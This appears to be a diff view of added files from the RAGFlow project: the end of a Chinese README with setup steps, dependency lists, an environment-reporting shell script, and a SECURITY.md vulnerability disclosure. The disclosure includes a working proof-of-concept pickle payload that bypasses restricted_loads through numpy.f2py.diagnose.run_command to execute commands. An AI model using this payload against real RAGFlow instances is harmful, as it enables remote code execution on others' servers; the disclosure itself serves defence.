> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.11.0,然后运行上述命令。
|
141 |
+
|
142 |
+
> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。
|
143 |
+
|
144 |
+
4. 服务器启动成功后再次确认服务器状态:
|
145 |
+
|
146 |
+
```bash
|
147 |
+
$ docker logs -f ragflow-server
|
148 |
+
```
|
149 |
+
|
150 |
+
_出现以下界面提示说明服务器启动成功:_
|
151 |
+
|
152 |
+
```bash
|
153 |
+
____ ______ __
|
154 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
155 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
156 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
157 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
158 |
+
/____/
|
159 |
+
|
160 |
+
* Running on all addresses (0.0.0.0)
|
161 |
+
* Running on http://127.0.0.1:9380
|
162 |
+
* Running on http://x.x.x.x:9380
|
163 |
+
INFO:werkzeug:Press CTRL+C to quit
|
164 |
+
```
|
165 |
+
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network abnormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
|
166 |
+
|
167 |
+
5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
|
168 |
+
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
|
169 |
+
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
|
170 |
+
|
171 |
+
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
|
172 |
+
|
173 |
+
_好戏开始,接着奏乐接着舞!_
|
174 |
+
|
175 |
+
## 🔧 系统配置
|
176 |
+
|
177 |
+
系统配置涉及以下三份文件:
|
178 |
+
|
179 |
+
- [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
|
180 |
+
- [service_conf.yaml](./docker/service_conf.yaml):配置各类后台服务。
|
181 |
+
- [docker-compose-CN.yml](./docker/docker-compose-CN.yml): 系统依赖该文件完成启动。
|
182 |
+
|
183 |
+
请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml](./docker/service_conf.yaml) 文件中的配置保持一致!
|
184 |
+
|
185 |
+
> [./docker/README](./docker/README.md) 文件提供了环境变量设置和服务配置的详细信息。请**一定要**确保 [./docker/README](./docker/README.md) 文件当中列出来的环境变量的值与 [service_conf.yaml](./docker/service_conf.yaml) 文件当中的系统配置保持一致。
|
186 |
+
|
187 |
+
如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose-CN.yml](./docker/docker-compose-CN.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
|
188 |
+
|
189 |
+
> 所有系统配置都需要通过系统重启生效:
|
190 |
+
>
|
191 |
+
> ```bash
|
192 |
+
> $ docker compose -f docker-compose-CN.yml up -d
|
193 |
+
> ```
|
194 |
+
|
195 |
+
## 🛠️ 源码编译、安装 Docker 镜像
|
196 |
+
|
197 |
+
如需从源码安装 Docker 镜像:
|
198 |
+
|
199 |
+
```bash
|
200 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
201 |
+
$ cd ragflow/
|
202 |
+
$ docker build -t infiniflow/ragflow:v0.11.0 .
|
203 |
+
$ cd docker
|
204 |
+
$ chmod +x ./entrypoint.sh
|
205 |
+
$ docker compose up -d
|
206 |
+
```
|
207 |
+
|
208 |
+
## 🛠️ 源码启动服务
|
209 |
+
|
210 |
+
如需从源码启动服务,请参考以下步骤:
|
211 |
+
|
212 |
+
1. 克隆仓库
|
213 |
+
|
214 |
+
```bash
|
215 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
216 |
+
$ cd ragflow/
|
217 |
+
```
|
218 |
+
|
219 |
+
2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)
|
220 |
+
|
221 |
+
```bash
|
222 |
+
$ conda create -n ragflow python=3.11.0
|
223 |
+
$ conda activate ragflow
|
224 |
+
$ pip install -r requirements.txt
|
225 |
+
```
|
226 |
+
如果 cuda > 12.0,需额外执行以下命令:
|
227 |
+
```bash
|
228 |
+
$ pip uninstall -y onnxruntime-gpu
|
229 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
230 |
+
```
|
231 |
+
|
232 |
+
3. 拷贝入口脚本并配置环境变量
|
233 |
+
|
234 |
+
```bash
|
235 |
+
$ cp docker/entrypoint.sh .
|
236 |
+
$ vi entrypoint.sh
|
237 |
+
```
|
238 |
+
使用以下命令获取python路径及ragflow项目路径:
|
239 |
+
```bash
|
240 |
+
$ which python
|
241 |
+
$ pwd
|
242 |
+
```
|
243 |
+
|
244 |
+
将上述 `which python` 的输出作为 `PY` 的值,将 `pwd` 的输出作为 `PYTHONPATH` 的值。
|
245 |
+
|
246 |
+
`LD_LIBRARY_PATH` 如果环境已经配置好,可以注释掉。
|
247 |
+
|
248 |
+
```bash
|
249 |
+
# 此处配置需要按照实际情况调整,两个 export 为新增配置
|
250 |
+
PY=${PY}
|
251 |
+
export PYTHONPATH=${PYTHONPATH}
|
252 |
+
# 可选:添加 Hugging Face 镜像
|
253 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
254 |
+
```
|
255 |
+
|
256 |
+
4. 启动基础服务
|
257 |
+
|
258 |
+
```bash
|
259 |
+
$ cd docker
|
260 |
+
$ docker compose -f docker-compose-base.yml up -d
|
261 |
+
```
|
262 |
+
|
263 |
+
5. 检查配置文件
|
264 |
+
确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。
|
265 |
+
|
266 |
+
6. 启动服务
|
267 |
+
|
268 |
+
```bash
|
269 |
+
$ chmod +x ./entrypoint.sh
|
270 |
+
$ bash ./entrypoint.sh
|
271 |
+
```
|
272 |
+
|
273 |
+
7. 启动WebUI服务
|
274 |
+
|
275 |
+
```bash
|
276 |
+
$ cd web
|
277 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
278 |
+
$ vim .umirc.ts
|
279 |
+
# 修改proxy.target为http://127.0.0.1:9380
|
280 |
+
$ npm run dev
|
281 |
+
```
|
282 |
+
|
283 |
+
8. 部署WebUI服务
|
284 |
+
|
285 |
+
```bash
|
286 |
+
$ cd web
|
287 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
288 |
+
$ umi build
|
289 |
+
$ mkdir -p /ragflow/web
|
290 |
+
$ cp -r dist /ragflow/web
|
291 |
+
$ apt install nginx -y
|
292 |
+
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
293 |
+
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
294 |
+
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
295 |
+
$ systemctl start nginx
|
296 |
+
```
|
297 |
+
## 📚 技术文档
|
298 |
+
|
299 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
300 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
301 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
302 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
303 |
+
|
304 |
+
## 📜 路线图
|
305 |
+
|
306 |
+
详见 [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162) 。
|
307 |
+
|
308 |
+
## 🏄 开源社区
|
309 |
+
|
310 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
311 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
312 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
313 |
+
|
314 |
+
## 🙌 贡献指南
|
315 |
+
|
316 |
+
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./docs/references/CONTRIBUTING.md) 。
|
317 |
+
|
318 |
+
## 🤝 商务合作
|
319 |
+
|
320 |
+
- [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
|
321 |
+
|
322 |
+
## 👥 加入社区
|
323 |
+
|
324 |
+
扫二维码添加 RAGFlow 小助手,进 RAGFlow 交流群。
|
325 |
+
|
326 |
+
<p align="center">
|
327 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
|
328 |
+
</p>
|
329 |
+
|
SECURITY.md
ADDED
@@ -0,0 +1,74 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# Security Policy
|
2 |
+
|
3 |
+
## Supported Versions
|
4 |
+
|
5 |
+
Use this section to tell people about which versions of your project are
|
6 |
+
currently being supported with security updates.
|
7 |
+
|
8 |
+
| Version | Supported |
|
9 |
+
| ------- | ------------------ |
|
10 |
+
| <=0.7.0 | :white_check_mark: |
|
11 |
+
|
12 |
+
## Reporting a Vulnerability
|
13 |
+
|
14 |
+
### Branch name
|
15 |
+
|
16 |
+
main
|
17 |
+
|
18 |
+
### Actual behavior
|
19 |
+
|
20 |
+
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable, leading to code execution.
|
21 |
+
The main reason is that the numpy module provides a numpy.f2py.diagnose.run_command function that directly executes commands, while the restricted_loads function allows users to import any function from the numpy module.
|
22 |
+
|
23 |
+
|
24 |
+
### Steps to reproduce
|
25 |
+
|
26 |
+
|
27 |
+
**ragflow_patch.py**
|
28 |
+
|
29 |
+
```py
|
30 |
+
import builtins
|
31 |
+
import io
|
32 |
+
import pickle
|
33 |
+
|
34 |
+
safe_module = {
|
35 |
+
'numpy',
|
36 |
+
'rag_flow'
|
37 |
+
}
|
38 |
+
|
39 |
+
|
40 |
+
class RestrictedUnpickler(pickle.Unpickler):
|
41 |
+
def find_class(self, module, name):
|
42 |
+
import importlib
|
43 |
+
if module.split('.')[0] in safe_module:
|
44 |
+
_module = importlib.import_module(module)
|
45 |
+
return getattr(_module, name)
|
46 |
+
# Forbid everything else.
|
47 |
+
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
|
48 |
+
(module, name))
|
49 |
+
|
50 |
+
|
51 |
+
def restricted_loads(src):
|
52 |
+
"""Helper function analogous to pickle.loads()."""
|
53 |
+
return RestrictedUnpickler(io.BytesIO(src)).load()
|
54 |
+
```
|
55 |
+
Then, **PoC.py**
|
56 |
+
```py
|
57 |
+
import pickle
|
58 |
+
from ragflow_patch import restricted_loads
|
59 |
+
class Exploit:
|
60 |
+
def __reduce__(self):
|
61 |
+
import numpy.f2py.diagnose
|
62 |
+
return numpy.f2py.diagnose.run_command, ('whoami', )
|
63 |
+
|
64 |
+
Payload=pickle.dumps(Exploit())
|
65 |
+
restricted_loads(Payload)
|
66 |
+
```
|
67 |
+
**Result**
|
68 |
+
![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
|
69 |
+
|
70 |
+
|
71 |
+
### Additional information
|
72 |
+
|
73 |
+
#### How to prevent?
|
74 |
+
Strictly filter both the module and the name before resolving them with the getattr function.
|
printEnvironment.sh
ADDED
@@ -0,0 +1,67 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
#!/bin/bash
|
2 |
+
|
3 |
+
# Print a one-line summary of the running distribution and kernel in the form
# "<distro id> <distro version> (Kernel version: <uname -r>)".
#
# lsb_release is tried first; when it is missing or yields nothing, the ID= and
# VERSION_ID= fields of the /etc/*-release files are used instead.
get_distro_info() {
    # Declare first and assign afterwards: `local var=$(cmd)` would replace
    # cmd's exit status with that of `local`.
    local distro_id distro_version kernel_version
    distro_id=$(lsb_release -i -s 2>/dev/null)
    distro_version=$(lsb_release -r -s 2>/dev/null)
    kernel_version=$(uname -r)

    # If lsb_release is not available, try parsing the /etc/*-release files.
    #   -h          drop the "file:" prefix grep adds when several files match
    #   head -n 1   keep a single value even if more than one file defines the key
    #   2>/dev/null stay quiet on systems that have no /etc/*-release file at all
    if [ -z "$distro_id" ] || [ -z "$distro_version" ]; then
        distro_id=$(grep -h '^ID=' /etc/*-release 2>/dev/null | head -n 1 | cut -d= -f2 | tr -d '"')
        distro_version=$(grep -h '^VERSION_ID=' /etc/*-release 2>/dev/null | head -n 1 | cut -d= -f2 | tr -d '"')
    fi

    echo "$distro_id $distro_version (Kernel version: $kernel_version)"
}
|
17 |
+
|
18 |
+
# Determine the Git repository name (the basename of the work-tree root), or
# store a placeholder message when it cannot be determined.
git_repo_name=''
if git rev-parse --is-inside-work-tree > /dev/null 2>&1; then
    # Test git's own exit status. Checking $? after
    # $(basename "$(git rev-parse ...)") only reports on basename, which
    # succeeds even when git itself failed, so the error branch never ran.
    if git_toplevel=$(git rev-parse --show-toplevel 2> /dev/null) && [ -n "$git_toplevel" ]; then
        git_repo_name=$(basename "$git_toplevel")
    else
        git_repo_name="(Can't get repo name)"
    fi
else
    git_repo_name="It NOT a Git repo"
fi
|
28 |
+
|
29 |
+
# Machine hardware name as reported by uname (e.g. x86_64, aarch64).
cpu_model="$(uname -m)"

# Second column of the line(s) of `free -h` output that contain "Mem".
memory_size="$(free -h | awk '/Mem/ {print $2}')"
|
34 |
+
|
35 |
+
# Record the installed Docker version, or a placeholder when the docker
# command is not on PATH.
docker_version=''
if command -v docker &> /dev/null; then
    # `docker --version` prints "Docker version X.Y.Z, build <hash>", so the
    # third space-separated field still carries a trailing comma; strip it.
    docker_version=$(docker --version | cut -d ' ' -f3)
    docker_version=${docker_version%,}
else
    docker_version="Docker not installed"
fi
|
42 |
+
|
43 |
+
# Record the version of the first Python interpreter found on PATH, or a
# placeholder when there is none.
# `python` is tried first (as before); `python3` is a fallback for systems
# that no longer ship an unversioned `python` command.
python_version="Python not installed"
for python_cmd in python python3; do
    if command -v "$python_cmd" &> /dev/null; then
        # 2>&1: Python 2 writes its --version banner to stderr, which would
        # otherwise leave the captured value empty.
        python_version=$("$python_cmd" --version 2>&1 | cut -d ' ' -f2)
        break
    fi
done
|
50 |
+
|
51 |
+
# Print all collected information.
echo "Current Repo: $git_repo_name"

# Abbreviated hash of the latest commit. stderr is discarded so that running
# outside a repository (or without git installed) produces only the friendly
# message below instead of an additional raw "fatal: ..." line.
git_version=$(git log -1 --pretty=format:'%h' 2> /dev/null)

if [ -z "$git_version" ]; then
    echo "Commit Id: The current directory is not a Git repository, or the Git command is not installed."
else
    echo "Commit Id: $git_version"
fi

echo "Operating system: $(get_distro_info)"
echo "CPU Type: $cpu_model"
echo "Memory: $memory_size"
echo "Docker Version: $docker_version"
echo "Python Version: $python_version"
|
requirements.txt
ADDED
@@ -0,0 +1,104 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
akshare==1.14.72
|
2 |
+
azure-storage-blob==12.22.0
|
3 |
+
azure-identity==1.17.1
|
4 |
+
azure-storage-file-datalake==12.16.0
|
5 |
+
anthropic===0.34.1
|
6 |
+
arxiv==2.1.3
|
7 |
+
Aspose.Slides==24.2.0
|
8 |
+
BCEmbedding==0.1.3
|
9 |
+
Bio==1.7.1
|
10 |
+
boto3==1.34.140
|
11 |
+
botocore==1.34.140
|
12 |
+
cachetools==5.3.3
|
13 |
+
chardet==5.2.0
|
14 |
+
cn2an==0.5.22
|
15 |
+
cohere==5.6.2
|
16 |
+
dashscope==1.14.1
|
17 |
+
datrie==0.8.2
|
18 |
+
deepl==1.18.0
|
19 |
+
demjson3==3.0.6
|
20 |
+
discord.py==2.3.2
|
21 |
+
duckduckgo_search==6.1.9
|
22 |
+
editdistance==0.8.1
|
23 |
+
elastic_transport==8.12.0
|
24 |
+
elasticsearch==8.12.1
|
25 |
+
elasticsearch_dsl==8.12.0
|
26 |
+
fastembed==0.2.6
|
27 |
+
fasttext==0.9.3
|
28 |
+
filelock==3.15.4
|
29 |
+
FlagEmbedding==1.2.10
|
30 |
+
Flask==3.0.3
|
31 |
+
Flask_Cors==5.0.0
|
32 |
+
Flask_Login==0.6.3
|
33 |
+
flask_session==0.8.0
|
34 |
+
google_search_results==2.4.2
|
35 |
+
groq==0.9.0
|
36 |
+
hanziconv==0.3.2
|
37 |
+
html_text==0.6.2
|
38 |
+
httpx==0.27.0
|
39 |
+
huggingface_hub==0.20.3
|
40 |
+
infinity_emb==0.0.51
|
41 |
+
itsdangerous==2.1.2
|
42 |
+
Markdown==3.6
|
43 |
+
markdown_to_json==2.1.1
|
44 |
+
minio==7.2.4
|
45 |
+
mistralai==0.4.2
|
46 |
+
nltk==3.9
|
47 |
+
numpy==1.26.4
|
48 |
+
ollama==0.2.1
|
49 |
+
onnxruntime==1.17.3
|
50 |
+
onnxruntime_gpu==1.17.1
|
51 |
+
openai==1.12.0
|
52 |
+
opencv_python==4.9.0.80
|
53 |
+
opencv_python_headless==4.9.0.80
|
54 |
+
openpyxl==3.1.2
|
55 |
+
ormsgpack==1.5.0
|
56 |
+
pandas==2.2.2
|
57 |
+
pdfplumber==0.10.4
|
58 |
+
peewee==3.17.1
|
59 |
+
Pillow==10.3.0
|
60 |
+
pipreqs==0.5.0
|
61 |
+
protobuf==5.27.2
|
62 |
+
psycopg2-binary==2.9.9
|
63 |
+
pyclipper==1.3.0.post5
|
64 |
+
pycryptodomex==3.20.0
|
65 |
+
pypdf==4.3.0
|
66 |
+
PyPDF2==3.0.1
|
67 |
+
pytest==8.2.2
|
68 |
+
python-dotenv==1.0.1
|
69 |
+
python_dateutil==2.8.2
|
70 |
+
python_pptx==0.6.23
|
71 |
+
pywencai==0.12.2
|
72 |
+
qianfan==0.4.6
|
73 |
+
ranx==0.3.20
|
74 |
+
readability_lxml==0.8.1
|
75 |
+
redis==5.0.3
|
76 |
+
Requests==2.32.2
|
77 |
+
replicate==0.31.0
|
78 |
+
roman_numbers==1.0.2
|
79 |
+
ruamel.base==1.0.0
|
80 |
+
scholarly==1.7.11
|
81 |
+
scikit_learn==1.5.0
|
82 |
+
selenium==4.22.0
|
83 |
+
setuptools==70.0.0
|
84 |
+
Shapely==2.0.5
|
85 |
+
six==1.16.0
|
86 |
+
StrEnum==0.4.15
|
87 |
+
tabulate==0.9.0
|
88 |
+
tencentcloud-sdk-python==3.0.1215
|
89 |
+
tika==2.6.0
|
90 |
+
tiktoken==0.6.0
|
91 |
+
torch==2.3.0
|
92 |
+
transformers==4.38.1
|
93 |
+
umap==0.1.1
|
94 |
+
vertexai==1.64.0
|
95 |
+
volcengine==1.0.146
|
96 |
+
voyageai==0.2.3
|
97 |
+
webdriver_manager==4.0.1
|
98 |
+
Werkzeug==3.0.3
|
99 |
+
wikipedia==1.4.0
|
100 |
+
word2number==1.1
|
101 |
+
xgboost==2.1.0
|
102 |
+
xpinyin==0.7.6
|
103 |
+
yfinance==0.1.96
|
104 |
+
zhipuai==2.0.1
|
requirements_arm.txt
ADDED
@@ -0,0 +1,175 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
accelerate==0.27.2
|
2 |
+
aiohttp==3.10.2
|
3 |
+
aiosignal==1.3.1
|
4 |
+
annotated-types==0.6.0
|
5 |
+
anthropic===0.34.1
|
6 |
+
anyio==4.3.0
|
7 |
+
argon2-cffi==23.1.0
|
8 |
+
argon2-cffi-bindings==21.2.0
|
9 |
+
#Aspose.Slides==24.2.0
|
10 |
+
attrs==23.2.0
|
11 |
+
blinker==1.7.0
|
12 |
+
cachelib==0.12.0
|
13 |
+
cachetools==5.3.3
|
14 |
+
certifi==2024.7.4
|
15 |
+
cffi==1.16.0
|
16 |
+
charset-normalizer==3.3.2
|
17 |
+
click==8.1.7
|
18 |
+
cohere==5.6.2
|
19 |
+
coloredlogs==15.0.1
|
20 |
+
cryptography==43.0.1
|
21 |
+
dashscope==1.14.1
|
22 |
+
datasets==2.17.1
|
23 |
+
datrie==0.8.2
|
24 |
+
demjson3==3.0.6
|
25 |
+
dill==0.3.8
|
26 |
+
distro==1.9.0
|
27 |
+
elastic-transport==8.12.0
|
28 |
+
elasticsearch==8.12.1
|
29 |
+
elasticsearch-dsl==8.12.0
|
30 |
+
et-xmlfile==1.1.0
|
31 |
+
filelock==3.13.1
|
32 |
+
fastembed==0.2.6
|
33 |
+
FlagEmbedding==1.2.5
|
34 |
+
Flask==3.0.2
|
35 |
+
Flask-Cors==5.0.0
|
36 |
+
Flask-Login==0.6.3
|
37 |
+
Flask-Session==0.6.0
|
38 |
+
flatbuffers==23.5.26
|
39 |
+
frozenlist==1.4.1
|
40 |
+
fsspec==2023.10.0
|
41 |
+
h11==0.14.0
|
42 |
+
hanziconv==0.3.2
|
43 |
+
httpcore==1.0.4
|
44 |
+
httpx==0.27.0
|
45 |
+
huggingface-hub==0.20.3
|
46 |
+
humanfriendly==10.0
|
47 |
+
idna==3.7
|
48 |
+
itsdangerous==2.1.2
|
49 |
+
Jinja2==3.1.4
|
50 |
+
joblib==1.3.2
|
51 |
+
lxml==5.1.0
|
52 |
+
MarkupSafe==2.1.5
|
53 |
+
minio==7.2.4
|
54 |
+
mpmath==1.3.0
|
55 |
+
multidict==6.0.5
|
56 |
+
multiprocess==0.70.16
|
57 |
+
networkx==3.2.1
|
58 |
+
nltk==3.9
|
59 |
+
numpy==1.26.4
|
60 |
+
# nvidia-cublas-cu12==12.1.3.1
|
61 |
+
# nvidia-cuda-cupti-cu12==12.1.105
|
62 |
+
# nvidia-cuda-nvrtc-cu12==12.1.105
|
63 |
+
# nvidia-cuda-runtime-cu12==12.1.105
|
64 |
+
# nvidia-cudnn-cu12==8.9.2.26
|
65 |
+
# nvidia-cufft-cu12==11.0.2.54
|
66 |
+
# nvidia-curand-cu12==10.3.2.106
|
67 |
+
# nvidia-cusolver-cu12==11.4.5.107
|
68 |
+
# nvidia-cusparse-cu12==12.1.0.106
|
69 |
+
# nvidia-nccl-cu12==2.19.3
|
70 |
+
# nvidia-nvjitlink-cu12==12.3.101
|
71 |
+
# nvidia-nvtx-cu12==12.1.105
|
72 |
+
ollama==0.1.9
|
73 |
+
# onnxruntime-gpu==1.17.1
|
74 |
+
openai==1.12.0
|
75 |
+
opencv-python==4.9.0.80
|
76 |
+
openpyxl==3.1.2
|
77 |
+
ormsgpack==1.5.0
|
78 |
+
packaging==23.2
|
79 |
+
pandas==2.2.1
|
80 |
+
pdfminer.six==20221105
|
81 |
+
pdfplumber==0.10.4
|
82 |
+
peewee==3.17.1
|
83 |
+
pillow==10.3.0
|
84 |
+
protobuf==4.25.3
|
85 |
+
psutil==5.9.8
|
86 |
+
psycopg2-binary==2.9.9
|
87 |
+
pyarrow==15.0.0
|
88 |
+
pyarrow-hotfix==0.6
|
89 |
+
pyclipper==1.3.0.post5
|
90 |
+
pycparser==2.21
|
91 |
+
pycryptodome
|
92 |
+
pycryptodome-test-vectors
|
93 |
+
pycryptodomex
|
94 |
+
pydantic==2.6.2
|
95 |
+
pydantic_core==2.16.3
|
96 |
+
PyJWT==2.8.0
|
97 |
+
PyMySQL==1.1.1
|
98 |
+
PyPDF2==3.0.1
|
99 |
+
pypdfium2==4.27.0
|
100 |
+
python-dateutil==2.8.2
|
101 |
+
python-docx==1.1.0
|
102 |
+
python-dotenv==1.0.1
|
103 |
+
python-pptx==0.6.23
|
104 |
+
PyYAML==6.0.1
|
105 |
+
qianfan==0.4.6
|
106 |
+
redis==5.0.3
|
107 |
+
regex==2023.12.25
|
108 |
+
replicate==0.31.0
|
109 |
+
requests==2.32.2
|
110 |
+
ruamel.yaml==0.18.6
|
111 |
+
ruamel.yaml.clib==0.2.8
|
112 |
+
safetensors==0.4.2
|
113 |
+
scikit-learn==1.5.0
|
114 |
+
scipy==1.12.0
|
115 |
+
sentence-transformers==2.4.0
|
116 |
+
shapely==2.0.3
|
117 |
+
six==1.16.0
|
118 |
+
sniffio==1.3.1
|
119 |
+
StrEnum==0.4.15
|
120 |
+
sympy==1.12
|
121 |
+
tencentcloud-sdk-python==3.0.1215
|
122 |
+
threadpoolctl==3.3.0
|
123 |
+
tika==2.6.0
|
124 |
+
tiktoken==0.6.0
|
125 |
+
tokenizers==0.15.2
|
126 |
+
torch==2.2.1
|
127 |
+
tqdm==4.66.3
|
128 |
+
transformers==4.38.1
|
129 |
+
# triton==2.2.0
|
130 |
+
typing_extensions==4.10.0
|
131 |
+
tzdata==2024.1
|
132 |
+
urllib3==2.2.2
|
133 |
+
Werkzeug==3.0.3
|
134 |
+
xgboost==2.0.3
|
135 |
+
XlsxWriter==3.2.0
|
136 |
+
xpinyin==0.7.6
|
137 |
+
xxhash==3.4.1
|
138 |
+
yarl==1.9.4
|
139 |
+
zhipuai==2.0.1
|
140 |
+
BCEmbedding
|
141 |
+
loguru==0.7.2
|
142 |
+
umap-learn
|
143 |
+
fasttext==0.9.2
|
144 |
+
volcengine==1.0.141
|
145 |
+
voyageai==0.2.3
|
146 |
+
opencv-python-headless==4.9.0.80
|
147 |
+
readability-lxml==0.8.1
|
148 |
+
html_text==0.6.2
|
149 |
+
selenium==4.21.0
|
150 |
+
webdriver-manager==4.0.1
|
151 |
+
cn2an==0.5.22
|
152 |
+
roman-numbers==1.0.2
|
153 |
+
word2number==1.1
|
154 |
+
markdown==3.6
|
155 |
+
mistralai==0.4.2
|
156 |
+
boto3==1.34.140
|
157 |
+
duckduckgo_search==6.1.9
|
158 |
+
google-generativeai==0.7.2
|
159 |
+
groq==0.9.0
|
160 |
+
wikipedia==1.4.0
|
161 |
+
Bio==1.7.1
|
162 |
+
arxiv==2.1.3
|
163 |
+
pypdf==4.3.0
|
164 |
+
google_search_results==2.4.2
|
165 |
+
editdistance==0.8.1
|
166 |
+
markdown_to_json==2.1.1
|
167 |
+
scholarly==1.7.11
|
168 |
+
deepl==1.18.0
|
169 |
+
psycopg2-binary==2.9.9
|
170 |
+
tabulate==0.9.0
|
171 |
+
vertexai==1.64.0
|
172 |
+
yfinance==0.1.96
|
173 |
+
pywencai==0.12.2
|
174 |
+
akshare==1.14.72
|
175 |
+
ranx==0.3.20
|